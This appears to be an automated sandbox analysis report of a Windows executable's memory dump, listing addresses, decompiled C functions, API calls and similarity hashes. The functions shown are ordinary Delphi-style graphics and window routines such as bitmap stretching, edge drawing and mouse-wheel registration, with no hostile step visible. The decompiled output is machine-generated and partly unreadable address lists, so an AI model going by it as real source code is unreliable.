                                                                                0x004666a4
                                                                                0x0046688d
                                                                                0x00466897
                                                                                0x004668a7
                                                                                0x004668b1
                                                                                0x004668b3
                                                                                0x004668b9
                                                                                0x004668be
                                                                                0x004668c0
                                                                                0x004668d2
                                                                                0x004668d7
                                                                                0x004668dc
                                                                                0x004668f1
                                                                                0x004668f1
                                                                                0x004668fb
                                                                                0x00466908
                                                                                0x00466912
                                                                                0x0046691c
                                                                                0x00466929
                                                                                0x00466938
                                                                                0x0046694a
                                                                                0x0046694f
                                                                                0x00466954
                                                                                0x00466956
                                                                                0x00466965
                                                                                0x00466966
                                                                                0x00466967
                                                                                0x00466968
                                                                                0x0046696a
                                                                                0x00466973
                                                                                0x00466974
                                                                                0x00466981
                                                                                0x00466990
                                                                                0x004669a2
                                                                                0x004669a7
                                                                                0x004669ac
                                                                                0x004669ae
                                                                                0x004669bd
                                                                                0x004669be
                                                                                0x004669bf
                                                                                0x004669c0
                                                                                0x004669c2
                                                                                0x004669cb
                                                                                0x004669cc
                                                                                0x004666aa
                                                                                0x004666b2
                                                                                0x004666bc
                                                                                0x004666c9
                                                                                0x004666d3
                                                                                0x004666df
                                                                                0x004666e9
                                                                                0x004666fc
                                                                                0x00466704
                                                                                0x0046670d
                                                                                0x00466711
                                                                                0x00466719
                                                                                0x0046671a
                                                                                0x0046672a
                                                                                0x00466737
                                                                                0x0046673c
                                                                                0x00466747
                                                                                0x0046674c
                                                                                0x00466751
                                                                                0x00466753
                                                                                0x00466762
                                                                                0x00466763
                                                                                0x00466764
                                                                                0x00466765
                                                                                0x00466767
                                                                                0x00466769
                                                                                0x0046676a
                                                                                0x0046677f
                                                                                0x00466787
                                                                                0x00466790
                                                                                0x00466794
                                                                                0x0046679c
                                                                                0x0046679d
                                                                                0x004667ad
                                                                                0x004667ba
                                                                                0x004667bf
                                                                                0x004667ca
                                                                                0x004667cf
                                                                                0x004667d4
                                                                                0x004667d6
                                                                                0x004667e5
                                                                                0x004667e6
                                                                                0x004667e7
                                                                                0x004667e8
                                                                                0x004667ea
                                                                                0x004667ec
                                                                                0x004667ed
                                                                                0x004667fd
                                                                                0x00466801
                                                                                0x00466809
                                                                                0x0046680a
                                                                                0x00466812
                                                                                0x0046681b
                                                                                0x0046681f
                                                                                0x00466827
                                                                                0x00466828
                                                                                0x00466838
                                                                                0x00466845
                                                                                0x0046684a
                                                                                0x00466855
                                                                                0x0046685a
                                                                                0x0046685f
                                                                                0x00466861
                                                                                0x00466870
                                                                                0x00466871
                                                                                0x00466872
                                                                                0x00466873
                                                                                0x00466875
                                                                                0x00466877
                                                                                0x00466878
                                                                                0x00466878
                                                                                0x004669d1
                                                                                0x004669d3
                                                                                0x004669d6
                                                                                0x004669d9
                                                                                0x004669e1
                                                                                0x004669ee
                                                                                0x004665d0
                                                                                0x004665d1
                                                                                0x004665d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00466a15
                                                                                0x00466a17
                                                                                0x00466a1a
                                                                                0x00466a1d
                                                                                0x00466a2a
                                                                                0x00466a2a
                                                                                0x004665ce
                                                                                0x004665cc
                                                                                0x004664cd

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a9f24f81a7d116526757999156be1767d0915e43dcdf6f836040968d95a88aa2
                                                                                • Instruction ID: b98e89a6adbca2397a49e089f3fa7ccc612caa931b427b032da4384d08e47561
                                                                                • Opcode Fuzzy Hash: a9f24f81a7d116526757999156be1767d0915e43dcdf6f836040968d95a88aa2
                                                                                • Instruction Fuzzy Hash: 0B026070B00214AFC700EFA9D982E9EB7F5EF49315F51446AF801BB392DA78ED458B25
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423C58, Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E00423C58(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t74;
				struct HDC__* _t76;
				signed int _t78;
				signed int _t79;
				char _t80;
				void* _t87;
				struct HDC__* _t110;
				void* _t131;
				struct HDC__* _t155;
				intOrPtr* _t159;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;
				intOrPtr _t185;

				_t160 = __ecx;
				_t183 = _t184;
				_t185 = _t184 + 0xffffffe4;
				_t179 = __ecx;
				_v8 = __edx;
				_t159 = __eax;
				_t181 =  *((intOrPtr*)(__eax + 0x28));
				_t167 =  *0x423ea4; // 0xf
				E0041FE98(_v8, __ecx, _t167);
				E004242C8(_t159);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *((intOrPtr*)(_t181 + 0x10));
				if(_t74 != 0) {
					_push(0xffffffff);
					_push(_t74);
					_t155 =  *(_v8 + 4);
					_push(_t155);
					L00406BD0();
					_v12 = _t155;
					_push( *(_v8 + 4));
					L00406BA0();
					_v13 = 1;
				}
				_push(0xc);
				_t76 =  *(_v8 + 4);
				_push(_t76);
				L00406AF8();
				_push(_t76);
				_push(0xe);
				_t78 =  *(_v8 + 4);
				L00406AF8();
				_t168 = _t78;
				_t79 = _t168 * _t78;
				if(_t79 > 8) {
					L4:
					_t80 = 0;
				} else {
					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
						_t80 = 1;
					} else {
						goto L4;
					}
				}
				if(_t80 == 0) {
					if(E00423FE4(_t159) == 0) {
						SetStretchBltMode(E0041FDC4(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t183);
				_push(0x423e95);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
					E00424268(_t159, _t160);
				}
				_t87 = E00423F28(_t159);
				_t171 =  *0x423ea4; // 0xf
				E0041FE98(_t87, _t160, _t171);
				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00423F28(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(E00423E9C);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t110 =  *(_v8 + 4);
						_push(_t110);
						L00406BD0();
						return _t110;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t183);
					_push(0x423e2a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t185;
					L00406A58();
					_v28 = E004201BC(0);
					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
					E00420360( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00423F28(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
					_t131 = 0;
					_t175 = 0;
					 *[fs:eax] = _t175;
					_push(0x423e6f);
					if(_v32 != 0) {
						_t131 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t131;
				}
			}





























                                                                                0x00423c58
                                                                                0x00423c59
                                                                                0x00423c5b
                                                                                0x00423c61
                                                                                0x00423c63
                                                                                0x00423c66
                                                                                0x00423c68
                                                                                0x00423c6b
                                                                                0x00423c74
                                                                                0x00423c7b
                                                                                0x00423c82
                                                                                0x00423c85
                                                                                0x00423c89
                                                                                0x00423c8e
                                                                                0x00423c90
                                                                                0x00423c92
                                                                                0x00423c96
                                                                                0x00423c99
                                                                                0x00423c9a
                                                                                0x00423c9f
                                                                                0x00423ca8
                                                                                0x00423ca9
                                                                                0x00423cae
                                                                                0x00423cae
                                                                                0x00423cb2
                                                                                0x00423cb7
                                                                                0x00423cba
                                                                                0x00423cbb
                                                                                0x00423cc0
                                                                                0x00423cc1
                                                                                0x00423cc6
                                                                                0x00423cca
                                                                                0x00423ccf
                                                                                0x00423cd3
                                                                                0x00423cd8
                                                                                0x00423ce9
                                                                                0x00423ce9
                                                                                0x00423cda
                                                                                0x00423cde
                                                                                0x00423ce7
                                                                                0x00423ced
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423ce7
                                                                                0x00423cf1
                                                                                0x00423d34
                                                                                0x00423d41
                                                                                0x00423d41
                                                                                0x00423cf3
                                                                                0x00423cfe
                                                                                0x00423d0c
                                                                                0x00423d24
                                                                                0x00423d24
                                                                                0x00423d48
                                                                                0x00423d49
                                                                                0x00423d4e
                                                                                0x00423d51
                                                                                0x00423d5d
                                                                                0x00423d61
                                                                                0x00423d61
                                                                                0x00423d68
                                                                                0x00423d6d
                                                                                0x00423d73
                                                                                0x00423d81
                                                                                0x00423e6a
                                                                                0x00423e71
                                                                                0x00423e74
                                                                                0x00423e77
                                                                                0x00423e80
                                                                                0x00423e82
                                                                                0x00423e87
                                                                                0x00423e8b
                                                                                0x00423e8e
                                                                                0x00423e8f
                                                                                0x00000000
                                                                                0x00423e8f
                                                                                0x00423e94
                                                                                0x00423d87
                                                                                0x00423d89
                                                                                0x00423d8e
                                                                                0x00423d93
                                                                                0x00423d94
                                                                                0x00423d99
                                                                                0x00423d9c
                                                                                0x00423da1
                                                                                0x00423dab
                                                                                0x00423dbb
                                                                                0x00423df5
                                                                                0x00423dfa
                                                                                0x00423dfc
                                                                                0x00423dff
                                                                                0x00423e02
                                                                                0x00423e0b
                                                                                0x00423e15
                                                                                0x00423e15
                                                                                0x00423e1e
                                                                                0x00000000
                                                                                0x00423e24
                                                                                0x00423e29
                                                                                0x00423e29

                                                                                APIs
                                                                                  • Part of subcall function 004242C8: 72E7AC50.USER32(00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424333
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042436C
                                                                                • 72E7B410.GDI32(?,?,000000FF), ref: 00423C9A
                                                                                • 72E7B150.GDI32(?,?,?,000000FF), ref: 00423CA9
                                                                                • 72E7AD70.GDI32(?,0000000C), ref: 00423CBB
                                                                                • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00423CCA
                                                                                • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00423CFE
                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 00423D0C
                                                                                • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00423D24
                                                                                • SetStretchBltMode.GDI32(00000000,00000003), ref: 00423D41
                                                                                • 72E7A590.GDI32(00000000,00000000,00423E2A,?,?,0000000E,00000000,?,0000000C), ref: 00423DA1
                                                                                • SelectObject.GDI32(?,?), ref: 00423DB6
                                                                                • SelectObject.GDI32(?,00000000), ref: 00423E15
                                                                                • DeleteDC.GDI32(00000000), ref: 00423E24
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                                                                • String ID:
                                                                                • API String ID: 2051775979-0
                                                                                • Opcode ID: c906eeb68a737587ac24b36a487ec7e1650cf8504f70cfbd4d93897cd3cdeefb
                                                                                • Instruction ID: 930dc268f662767776c74af4ca258a037dfb2cb6be22551be327afb4fc9958b1
                                                                                • Opcode Fuzzy Hash: c906eeb68a737587ac24b36a487ec7e1650cf8504f70cfbd4d93897cd3cdeefb
                                                                                • Instruction Fuzzy Hash: C67148B5B00215AFDB00EFA9D985F5EB7F8AF09304F51856AF508EB281D638EE44CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004201CC, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 51%
                                                                                			E004201CC(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00406A58();
				_v28 = __eax;
				_push(0);
				L00406A58();
				_v32 = __eax;
				_push(_t87);
				_push(0x42031a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00406E20();
					_v24 = _t37;
					if(_v24 == 0) {
						E00420114(__ecx);
					}
					_push(_t87);
					_push(0x420289);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00406A50();
					_v20 = _t41;
					if(_v20 == 0) {
						E00420114(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x420290);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407080();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00406A40();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(E00420321);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                                                                0x004201cd
                                                                                0x004201cf
                                                                                0x004201da
                                                                                0x004201db
                                                                                0x004201dc
                                                                                0x004201de
                                                                                0x004201e1
                                                                                0x004201e3
                                                                                0x004201e8
                                                                                0x004201eb
                                                                                0x004201ed
                                                                                0x004201f2
                                                                                0x004201f7
                                                                                0x004201f8
                                                                                0x004201fd
                                                                                0x00420200
                                                                                0x0042020d
                                                                                0x00420214
                                                                                0x0042022e
                                                                                0x00420230
                                                                                0x00420235
                                                                                0x0042023c
                                                                                0x0042023e
                                                                                0x0042023e
                                                                                0x00420245
                                                                                0x00420246
                                                                                0x0042024b
                                                                                0x0042024e
                                                                                0x00420254
                                                                                0x00420258
                                                                                0x00420259
                                                                                0x0042025c
                                                                                0x0042025d
                                                                                0x00420262
                                                                                0x00420269
                                                                                0x0042026b
                                                                                0x0042026b
                                                                                0x00420272
                                                                                0x00420275
                                                                                0x00420278
                                                                                0x0042027d
                                                                                0x00420280
                                                                                0x00420281
                                                                                0x00420283
                                                                                0x00420288
                                                                                0x00420216
                                                                                0x00420216
                                                                                0x00420218
                                                                                0x0042021a
                                                                                0x0042021f
                                                                                0x00420220
                                                                                0x00420223
                                                                                0x00420224
                                                                                0x00420229
                                                                                0x00420294
                                                                                0x004202a3
                                                                                0x004202b2
                                                                                0x004202d9
                                                                                0x004202e0
                                                                                0x004202e7
                                                                                0x004202e7
                                                                                0x004202ee
                                                                                0x004202f5
                                                                                0x004202f5
                                                                                0x004202ee
                                                                                0x004202fc
                                                                                0x004202ff
                                                                                0x00420302
                                                                                0x0042030b
                                                                                0x00420319
                                                                                0x00420319

                                                                                APIs
                                                                                • 72E7A590.GDI32(00000000), ref: 004201E3
                                                                                • 72E7A590.GDI32(00000000,00000000), ref: 004201ED
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0042020D
                                                                                • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,0042031A,?,00000000,00000000), ref: 00420224
                                                                                • 72E7AC50.USER32(00000000,?,00000018,?,00000000,0042031A,?,00000000,00000000), ref: 00420230
                                                                                • 72E7A520.GDI32(00000000,?,?,00000000,00420289,?,00000000,?,00000018,?,00000000,0042031A,?,00000000,00000000), ref: 0042025D
                                                                                • 72E7B380.USER32(00000000,00000000,00420290,00000000,00420289,?,00000000,?,00000018,?,00000000,0042031A,?,00000000,00000000), ref: 00420283
                                                                                • SelectObject.GDI32(?,?), ref: 0042029E
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202AD
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 004202D9
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202E7
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202F5
                                                                                • DeleteDC.GDI32(?), ref: 0042030B
                                                                                • DeleteDC.GDI32(?), ref: 00420314
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                                • String ID:
                                                                                • API String ID: 956127455-0
                                                                                • Opcode ID: def52988ccf9f29a98a0ce8aab8240d9a233bbc5dca25520826afe0c81d20552
                                                                                • Instruction ID: 7d38c530bc7270683e9fe1384592e284e1f201ef5219feca1b4d3c6428f362da
                                                                                • Opcode Fuzzy Hash: def52988ccf9f29a98a0ce8aab8240d9a233bbc5dca25520826afe0c81d20552
                                                                                • Instruction Fuzzy Hash: 5F410AB1B40219AFDB00EAE9D846FAFB7FCEB09704F514466F615F7281C6786D108B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043CB6C, Relevance: 19.7, APIs: 13, Instructions: 213COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 50%
                                                                                			E0043CB6C(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t115;
				void* _t166;
				intOrPtr* _t188;
				intOrPtr* _t191;
				void* _t200;
				intOrPtr _t207;
				signed int _t224;
				void* _t227;
				void* _t229;
				intOrPtr _t230;

				_t227 = _t229;
				_t230 = _t229 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t115 = E0043BD14(_v8);
					_push(_t115);
					L00406F20();
					_v16 = _t115;
					_push(_t227);
					_push(0x43cdd2);
					_push( *[fs:edx]);
					 *[fs:edx] = _t230;
					GetClientRect(E0043BD14(_v8),  &_v32);
					GetWindowRect(E0043BD14(_v8),  &_v48);
					MapWindowPoints(0, E0043BD14(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t200 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t200 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t200 = _t200 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t224 = GetWindowLongA(E0043BD14(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t200;
						}
						if((_t224 & 0x00200000) != 0) {
							_t191 =  *0x486b30; // 0x487a94
							_v48.right = _v48.right +  *((intOrPtr*)( *_t191))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t200;
						}
						if((_t224 & 0x00100000) != 0) {
							_t188 =  *0x486b30; // 0x487a94
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t188))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x46b99c + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x46b9ac + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x46b9bc + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x46b9cc + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041F36C( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(0x43cdd9);
					_push(_v16);
					_t166 = E0043BD14(_v8);
					_push(_t166);
					L00407080();
					return _t166;
				} else {
					return  *((intOrPtr*)( *_v8 - 0x10))();
				}
			}



















                                                                                0x0043cb6d
                                                                                0x0043cb6f
                                                                                0x0043cb75
                                                                                0x0043cb78
                                                                                0x0043cb85
                                                                                0x0043cb9a
                                                                                0x0043cb9f
                                                                                0x0043cba0
                                                                                0x0043cba5
                                                                                0x0043cbaa
                                                                                0x0043cbab
                                                                                0x0043cbb0
                                                                                0x0043cbb3
                                                                                0x0043cbc3
                                                                                0x0043cbd5
                                                                                0x0043cbeb
                                                                                0x0043cc00
                                                                                0x0043cc19
                                                                                0x0043cc24
                                                                                0x0043cc25
                                                                                0x0043cc26
                                                                                0x0043cc27
                                                                                0x0043cc37
                                                                                0x0043cc42
                                                                                0x0043cc43
                                                                                0x0043cc44
                                                                                0x0043cc45
                                                                                0x0043cc50
                                                                                0x0043cc56
                                                                                0x0043cc62
                                                                                0x0043cc67
                                                                                0x0043cc67
                                                                                0x0043cc77
                                                                                0x0043cc7c
                                                                                0x0043cc7c
                                                                                0x0043cc92
                                                                                0x0043cc9e
                                                                                0x0043cca0
                                                                                0x0043cca0
                                                                                0x0043ccad
                                                                                0x0043ccaf
                                                                                0x0043ccaf
                                                                                0x0043ccbc
                                                                                0x0043ccbe
                                                                                0x0043ccbe
                                                                                0x0043ccc7
                                                                                0x0043cccb
                                                                                0x0043ccd4
                                                                                0x0043ccd4
                                                                                0x0043cce1
                                                                                0x0043cce3
                                                                                0x0043cce3
                                                                                0x0043ccec
                                                                                0x0043ccf0
                                                                                0x0043ccf9
                                                                                0x0043ccf9
                                                                                0x0043cd59
                                                                                0x0043cd59
                                                                                0x0043cd72
                                                                                0x0043cd7d
                                                                                0x0043cd7e
                                                                                0x0043cd7f
                                                                                0x0043cd80
                                                                                0x0043cd91
                                                                                0x0043cdad
                                                                                0x0043cdb4
                                                                                0x0043cdb7
                                                                                0x0043cdba
                                                                                0x0043cdc2
                                                                                0x0043cdc6
                                                                                0x0043cdcb
                                                                                0x0043cdcc
                                                                                0x0043cdd1
                                                                                0x0043cdd9
                                                                                0x0043cdea
                                                                                0x0043cdea

                                                                                APIs
                                                                                • 72E7B080.USER32(00000000), ref: 0043CBA0
                                                                                • GetClientRect.USER32 ref: 0043CBC3
                                                                                • GetWindowRect.USER32 ref: 0043CBD5
                                                                                • MapWindowPoints.USER32 ref: 0043CBEB
                                                                                • OffsetRect.USER32(?,?,?), ref: 0043CC00
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043CC19
                                                                                • InflateRect.USER32(?,00000000,00000000), ref: 0043CC37
                                                                                • GetWindowLongA.USER32 ref: 0043CC8D
                                                                                • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043CD59
                                                                                • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043CD72
                                                                                • OffsetRect.USER32(?,?,?), ref: 0043CD91
                                                                                • FillRect.USER32 ref: 0043CDAD
                                                                                • 72E7B380.USER32(00000000,?,0043CDD9,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0043CDCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                                • String ID:
                                                                                • API String ID: 156109915-0
                                                                                • Opcode ID: aac0cf2e32b499766f63477c942ff39a3e6c89f4748efe3072f24333a8105011
                                                                                • Instruction ID: 87f5691973d99f2f36ea90999ad42d0aa71137b0dd96603b0bfef02937046dfa
                                                                                • Opcode Fuzzy Hash: aac0cf2e32b499766f63477c942ff39a3e6c89f4748efe3072f24333a8105011
                                                                                • Instruction Fuzzy Hash: C781F571E00209AFCB41DBA9C985EEEB7F9AF09304F1440A6F514F7292C779AE04CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004072BC, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004072BC(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
